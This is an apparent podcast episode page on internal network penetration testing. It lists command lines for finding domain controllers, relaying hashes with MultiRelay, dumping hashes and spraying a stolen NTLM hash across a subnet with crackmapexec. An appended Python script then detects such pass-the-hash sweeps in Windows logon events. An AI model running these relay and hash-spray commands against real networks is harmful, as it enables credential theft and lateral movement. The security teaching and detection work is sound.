7MS #390: Tales of Internal Network Pentest Pwnage - Part 11
Dec 6, 2019 • 63 minutes
Today's episode is brought to you by ITProTV. It’s never too late to start a new career in IT or move up the ladder, and ITProTV has you covered - from CompTIA and Cisco to EC-Council and VMWare. Get over 65 hours of IT training for free by visiting https://itpro.tv/7minute.
Today's episode is a twofer. That's right, two tales of internal network pentest pwnage. Whoop whoop! We cover:
What the SDAD (Single Domain Admin Dance) and DDAD (Double Domain Admin Dance) are (spoiler: imagine your dad trying to dance cool...it's like that, but more awkward)
A good way to quickly find domain controllers in your environment:
nslookup -type=SRV _ldap._tcp.dc._msdcs.YOURDOMAIN.SUFFIX
Early in the engagement I'd highly recommend checking for Kerberoastable accounts
I really like Multirelay to help me pass hashes, like:
MultiRelay.py -t 184.108.40.206 -u bob.admin Administrator yourmoms.admin
Once you get a shell, run dump to dump hashes!
Then, use CME to pass that hash around the network!
crackmapexec smb 192.168.0.0/24 -u Administrator -H YOUR-HASH-GOES-HERE --local-auth
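From the blue-team side, that last step leaves a recognisable footprint: one source host producing NTLM network logons (Security event 4624, LogonType 3) as the same local account on many computers within minutes. The detection below is an added example, not code from the podcast or from CrackMapExec; the event records are constructed, and the key=value line layout is an assumed SIEM export format.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample 4624 records (key=value fields, as a SIEM might export
# them). Source 192.168.0.50 fans out as the local Administrator over NTLM to
# four hosts in thirty seconds; the remaining lines are routine traffic.
SAMPLE_EVENTS = [
    "2019-12-06T10:00:01 Computer=FS01 EventID=4624 LogonType=3 AuthenticationPackageName=NTLM TargetUserName=Administrator IpAddress=192.168.0.50",
    "2019-12-06T10:00:09 Computer=WS02 EventID=4624 LogonType=3 AuthenticationPackageName=NTLM TargetUserName=Administrator IpAddress=192.168.0.50",
    "2019-12-06T10:00:17 Computer=WS03 EventID=4624 LogonType=3 AuthenticationPackageName=NTLM TargetUserName=Administrator IpAddress=192.168.0.50",
    "2019-12-06T10:00:30 Computer=DC01 EventID=4624 LogonType=3 AuthenticationPackageName=NTLM TargetUserName=Administrator IpAddress=192.168.0.50",
    "2019-12-06T10:01:02 Computer=FS01 EventID=4624 LogonType=3 AuthenticationPackageName=Kerberos TargetUserName=alice IpAddress=192.168.0.77",
    "2019-12-06T10:02:15 Computer=WS09 EventID=4624 LogonType=3 AuthenticationPackageName=NTLM TargetUserName=Administrator IpAddress=192.168.0.77",
    "2019-12-06T10:03:40 Computer=WS09 EventID=4624 LogonType=2 AuthenticationPackageName=NTLM TargetUserName=bob IpAddress=127.0.0.1",
]

def parse_event(line):
    """Turn 'ISO-timestamp key=value ...' into a dict with a datetime 'ts'."""
    ts_str, *fields = line.split()
    ev = dict(f.split("=", 1) for f in fields)
    ev["ts"] = datetime.fromisoformat(ts_str)
    return ev

def find_pth_sweeps(lines, window=timedelta(minutes=5), min_hosts=3):
    """Map (source_ip, account) -> sorted hosts for every source that made NTLM
    network logons (4624, LogonType 3) as one account on >= min_hosts distinct
    computers inside a single window. One admin NTLM logon is routine; the same
    account fanning out across a subnet in minutes is the hash-spray footprint."""
    by_key = defaultdict(list)
    for line in lines:
        ev = parse_event(line)
        if ev.get("EventID") != "4624" or ev.get("LogonType") != "3":
            continue
        if ev.get("AuthenticationPackageName") != "NTLM":
            continue
        by_key[(ev["IpAddress"], ev["TargetUserName"].lower())].append(
            (ev["ts"], ev["Computer"]))
    sweeps = {}
    for key, events in by_key.items():
        events.sort()
        for i, (start, _) in enumerate(events):  # slide the window forward
            hosts = {host for ts, host in events[i:] if ts - start <= window}
            if len(hosts) >= min_hosts:
                sweeps[key] = sorted(hosts)
                break
    return sweeps

if __name__ == "__main__":
    for (src, account), hosts in find_pth_sweeps(SAMPLE_EVENTS).items():
        print(f"{src} as {account} -> {', '.join(hosts)}")
```

Tune `min_hosts` and `window` against your own baseline; patch-management and backup agents that legitimately touch many hosts should be allow-listed by source IP rather than by raising the threshold.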